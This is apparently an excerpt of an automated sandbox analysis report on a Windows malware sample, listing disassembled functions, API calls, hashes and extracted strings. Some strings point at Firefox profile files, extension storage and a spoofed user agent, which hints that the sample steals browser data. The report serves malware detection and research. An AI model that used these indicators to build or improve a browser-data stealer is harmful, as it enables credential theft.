                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                • Opcode ID: c8773dfb6b415e3e7d51ab5209b09a7c227dcb9d99e79654922a01f7a34a0bae
                                                                                                                                                                                                • Instruction ID: ceaca6adfa3240ede8a484106c57b587d1176da9a309cbbe19c7f43d0b799a26
                                                                                                                                                                                                • Opcode Fuzzy Hash: c8773dfb6b415e3e7d51ab5209b09a7c227dcb9d99e79654922a01f7a34a0bae
                                                                                                                                                                                                • Instruction Fuzzy Hash: EB016D31A00659EFDB119B54DC09BBEBBB9FB48B11F044529F821E2691DB789A40CF90
                                                                                                                                                                                                Function 00175285 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 0017530A
                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 001753D3
                                                                                                                                                                                                • __freea.LIBCMT ref: 0017543A
                                                                                                                                                                                                  • Part of subcall function 0017188C: RtlAllocateHeap.NTDLL(00000000,?,?,?,001414D8,00000000,?), ref: 001718BE
                                                                                                                                                                                                • __freea.LIBCMT ref: 0017544D
                                                                                                                                                                                                • __freea.LIBCMT ref: 0017545A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1423051803-0
                                                                                                                                                                                                • Opcode ID: ea566673079a88a9917013386b937b02f8ac811d9896fcf37e02bcf079a2a927
                                                                                                                                                                                                • Instruction ID: 7a9ffbd125ddcee69001b9bda00674f1eed611ecb168f260de903ea90ae285d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: ea566673079a88a9917013386b937b02f8ac811d9896fcf37e02bcf079a2a927
                                                                                                                                                                                                • Instruction Fuzzy Hash: BE51D272600606AFEF205FA4CC81EBB3ABAEF54755B298028FD0DD6151FBB0DD90C660
                                                                                                                                                                                                Function 0015B637 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015B63E
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015B64B
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0015B69E
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015B6C8
                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0015B6D5
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2687776920-0
                                                                                                                                                                                                • Opcode ID: 166ea88bb5c837391ae695b38db6739d9aef62d386ba83d807d056582ad7bf69
                                                                                                                                                                                                • Instruction ID: 142b82a3228506bfe5083c2ba28600c530304785602fde7048c4f62307d28c47
                                                                                                                                                                                                • Opcode Fuzzy Hash: 166ea88bb5c837391ae695b38db6739d9aef62d386ba83d807d056582ad7bf69
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5421F131908205CFCB15EFA8D5916AEB7F1EF54322F64811DE865AB2A0DB309E468B80
                                                                                                                                                                                                Function 0015C3F2 Relevance: 7.6, APIs: 5, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0015C3F9
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015C406
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: __EH_prolog3_GS.LIBCMT ref: 0015A4F1
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::_Lockit.LIBCPMT ref: 0015A502
                                                                                                                                                                                                  • Part of subcall function 0015A4EA: std::_Lockit::~_Lockit.LIBCPMT ref: 0015A524
                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0015C459
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015C483
                                                                                                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 0015C490
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2687776920-0
                                                                                                                                                                                                • Opcode ID: 6d05f1de99d1c26048e466b5c3e8c0fa681f2f6a79a2b16b389f8a4796b2a7cc
                                                                                                                                                                                                • Instruction ID: 2772d1ab627a549c000e88f2e9a5db641779848875bee1c939ac6ef3478f7abc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d05f1de99d1c26048e466b5c3e8c0fa681f2f6a79a2b16b389f8a4796b2a7cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: F2110630901209CFCB05EFA49591ABEB7B1AF54712F64411DE921AF2D1CB745E4A8BD1
                                                                                                                                                                                                Function 0015DE24 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0015DE2B
                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0015DE36
                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0015DEA4
                                                                                                                                                                                                  • Part of subcall function 0015DF87: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0015DF9F
                                                                                                                                                                                                • std::locale::_Setgloballocale.LIBCPMT ref: 0015DE51
                                                                                                                                                                                                • _Yarn.LIBCPMT ref: 0015DE67
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1088826258-0
                                                                                                                                                                                                • Opcode ID: 653fb7d62464e805adc1d8ef59e47075e0c09b68c9a50b24f698b369eb3a4366
                                                                                                                                                                                                • Instruction ID: a4da19bc2d20cc2744404ef5b9b43c14128198031e747030ed5042da31a37b68
                                                                                                                                                                                                • Opcode Fuzzy Hash: 653fb7d62464e805adc1d8ef59e47075e0c09b68c9a50b24f698b369eb3a4366
                                                                                                                                                                                                • Instruction Fuzzy Hash: 91017175A00515DBC716EB20E84697D77B1FFA4742B54404EED125B382CF746A4ACBC2
                                                                                                                                                                                                Function 001495B2 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 264sleepCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 001495BC
                                                                                                                                                                                                  • Part of subcall function 0014B3E8: __EH_prolog3.LIBCMT ref: 0014B3EF
                                                                                                                                                                                                  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
                                                                                                                                                                                                  • Part of subcall function 0014B64E: __EH_prolog3.LIBCMT ref: 0014B655
                                                                                                                                                                                                  • Part of subcall function 00149983: __EH_prolog3_GS.LIBCMT ref: 0014998D
                                                                                                                                                                                                  • Part of subcall function 00146B3E: __EH_prolog3_GS.LIBCMT ref: 00146B48
                                                                                                                                                                                                  • Part of subcall function 00146B3E: lstrlenA.KERNEL32(?,?), ref: 00146C2D
                                                                                                                                                                                                  • Part of subcall function 00146B3E: GetProcessHeap.KERNEL32 ref: 00146C6A
                                                                                                                                                                                                  • Part of subcall function 0014B51E: __EH_prolog3.LIBCMT ref: 0014B525
                                                                                                                                                                                                  • Part of subcall function 0014B614: __EH_prolog3.LIBCMT ref: 0014B61B
                                                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 0014990F
                                                                                                                                                                                                  • Part of subcall function 00148D6A: __EH_prolog3_GS.LIBCMT ref: 00148D74
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3$H_prolog3_$HeapProcessSleeplstrlen
                                                                                                                                                                                                • String ID: /Up/b$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                                • API String ID: 3276473106-2390619756
                                                                                                                                                                                                • Opcode ID: 9e3b35788bcb1ca4322ca263d0b5d570b34f9301229f79dbf135d67cf1e41089
                                                                                                                                                                                                • Instruction ID: 6ffd17a42a77b48df70016a29f19178d12d8051c119893fa022fcbfd3b2542ad
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e3b35788bcb1ca4322ca263d0b5d570b34f9301229f79dbf135d67cf1e41089
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CA1BE319002599BCF18EB64CC86AEEBB75AF25310F5481ADE449A71E2DF305F8ACF51
                                                                                                                                                                                                Function 00147FA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 216COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00147FAD
                                                                                                                                                                                                  • Part of subcall function 0014B4BA: __EH_prolog3.LIBCMT ref: 0014B4C1
                                                                                                                                                                                                  • Part of subcall function 00147DEC: __EH_prolog3_GS.LIBCMT ref: 00147DF3
                                                                                                                                                                                                  • Part of subcall function 00147DEC: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00147FEA), ref: 00147E40
                                                                                                                                                                                                  • Part of subcall function 00147DEC: HeapFree.KERNEL32(00000000,?,?,?,?,?,00147FEA), ref: 00147E47
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_Heap$FreeH_prolog3Process
                                                                                                                                                                                                • String ID: \Ext\$\prefs.js$\storage\default\
                                                                                                                                                                                                • API String ID: 4110124055-721971596
                                                                                                                                                                                                • Opcode ID: 6510c7f99e92dc43b00bf21750f5fa04918f2373b55a5cce8f122f3cf98a23ca
                                                                                                                                                                                                • Instruction ID: 0438abc208828300e90328ac21d9eea858a14a2980d08de231469555ae74359d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6510c7f99e92dc43b00bf21750f5fa04918f2373b55a5cce8f122f3cf98a23ca
                                                                                                                                                                                                • Instruction Fuzzy Hash: BF919030D14288EADF05EBB4C996BEDBBB4AF25300F9440E8E105A71A2DF745F49CB52
                                                                                                                                                                                                Function 00147DEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00147DF3
                                                                                                                                                                                                  • Part of subcall function 0015AE24: __EH_prolog3_GS.LIBCMT ref: 0015AE2E
                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00147FEA), ref: 00147E40
                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,00147FEA), ref: 00147E47
                                                                                                                                                                                                  • Part of subcall function 0014A6BD: __EH_prolog3.LIBCMT ref: 0014A6C4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • user_pref("extensions.webextensions.uuids", ", xrefs: 00147E5D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_Heap$FreeH_prolog3Process
                                                                                                                                                                                                • String ID: user_pref("extensions.webextensions.uuids", "
                                                                                                                                                                                                • API String ID: 4110124055-3221024688
                                                                                                                                                                                                • Opcode ID: 5199d80c473e97fd21925fb20e3e66bcd082600c876752c5a9dec156cb29bd19
                                                                                                                                                                                                • Instruction ID: 537aaca04cdf09595c9600795095ddbea208520b83463cd85ca313456afb027c
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5199d80c473e97fd21925fb20e3e66bcd082600c876752c5a9dec156cb29bd19
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA51B371D04248DFCF01EBB8C985BEEBBB4AF18300F608119E511B7292D7749B49CBA2
                                                                                                                                                                                                Function 00149983 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0014998D
                                                                                                                                                                                                  • Part of subcall function 0015C2B7: __EH_prolog3_GS.LIBCMT ref: 0015C2C1
                                                                                                                                                                                                  • Part of subcall function 0015C0F0: __EH_prolog3_catch_GS.LIBCMT ref: 0015C0F7
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: __EH_prolog3_GS.LIBCMT ref: 0015ABF9
                                                                                                                                                                                                  • Part of subcall function 0015ABF2: ctype.LIBCPMT ref: 0015ACB5
                                                                                                                                                                                                  • Part of subcall function 0014B7BF: __EH_prolog3.LIBCMT ref: 0014B7C6
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: H_prolog3_$H_prolog3H_prolog3_catch_ctype
                                                                                                                                                                                                • String ID: 17586936307509717578$@$ntdll.dll
                                                                                                                                                                                                • API String ID: 2848298560-3853183820
                                                                                                                                                                                                • Opcode ID: d09bf49e34d78e11562e56b6fcfb7374c0bf9052c163a5e989ae624d148c4a97
                                                                                                                                                                                                • Instruction ID: 945cbe301d590ba84479628a5d9b8c91f3a77bee1d38bff7e4c36bf7b23eb851
                                                                                                                                                                                                • Opcode Fuzzy Hash: d09bf49e34d78e11562e56b6fcfb7374c0bf9052c163a5e989ae624d148c4a97
                                                                                                                                                                                                • Instruction Fuzzy Hash: 84213CB1D01358DBCB00EFE4C886ACDBBB4AF18310F54416AE554FB292DB705A45CFA1
                                                                                                                                                                                                Function 00163537 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001634E8,00000000,?,0019A8FC,?,?,?,0016368B,00000004,InitializeCriticalSectionEx,00188594,InitializeCriticalSectionEx), ref: 00163544
                                                                                                                                                                                                • GetLastError.KERNEL32(?,001634E8,00000000,?,0019A8FC,?,?,?,0016368B,00000004,InitializeCriticalSectionEx,00188594,InitializeCriticalSectionEx,00000000,?,001632D2), ref: 0016354E
                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00163576
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                                • Opcode ID: 1192cb7f90d361e81d4c4a57d17fb990da74d26ff6b368843d1dfd569f2b737e
                                                                                                                                                                                                • Instruction ID: f1672f45fdeb64505f01e44f8bea6d12df62de490fdfcc8f400cca4af2e13327
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1192cb7f90d361e81d4c4a57d17fb990da74d26ff6b368843d1dfd569f2b737e
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5E04F31A80308F7EF211FA1EC0AB683E65BB10B51F105430F91EE94E2EB719B608B84
                                                                                                                                                                                                Function 00170338 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetConsoleOutputCP.KERNEL32(4B460E4E,00000000,00000000,?), ref: 0017039B
                                                                                                                                                                                                  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001705ED
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00170633
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 001706D6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2112829910-0
                                                                                                                                                                                                • Opcode ID: 2dde465259554c60ed090385f5f5cfc322b41c3befbedd847166e7444effc12f
                                                                                                                                                                                                • Instruction ID: 35574c2bde33bd47fb732b78d4382beda7d8ba0e44113d51eade4ffdabaf365f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2dde465259554c60ed090385f5f5cfc322b41c3befbedd847166e7444effc12f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23D169B5D04248DFCF16CFA8C8909ADBBB5FF49314F24812AE45AEB351D730A992CB50
                                                                                                                                                                                                Function 001624E1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AdjustPointer
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1740715915-0
                                                                                                                                                                                                • Opcode ID: 0ff31c5ec9675d5d47ca7420a6342a1ef7cc89672904df2034653c58e669f0a2
                                                                                                                                                                                                • Instruction ID: cb7e63e58490b822aca630e4241080c2cd135e038e5cc3fd80c6512814ff4f61
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ff31c5ec9675d5d47ca7420a6342a1ef7cc89672904df2034653c58e669f0a2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D51E371A01A02AFEB398F14DD55BBAB3B4EF14315F24842DED16472A1E731ECA0DB90
                                                                                                                                                                                                Function 001724E7 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.1869957636.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                                                                                                                                • Associated: 00000000.00000002.1869942893.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1869987849.0000000000186000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870010419.0000000000199000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000000.00000002.1870026315.000000000019C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_140000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a9f7b762ea0a8796d0f6acb0df531898cf52811d35207f916845a741ecbd32ee
                                                                                                                                                                                                • Instruction ID: ea2fcbd55d2a7b2e10e896d581f3715afa05b7a2c4f00c08e55646eac7189370
                                                                                                                                                                                                • Opcode Fuzzy Hash: a9f7b762ea0a8796d0f6acb0df531898cf52811d35207f916845a741ecbd32ee
                                                                                                                                                                                                • Instruction Fuzzy Hash: C741EBB2A00704AFD7249F38DC52B9EBBF9EB99710F10C52AF419DB281D7759A428790
                                                                                                                                                                                                Function 00175528 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 0017657C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00175430,?,00000000,-00000008), ref: 001765DD
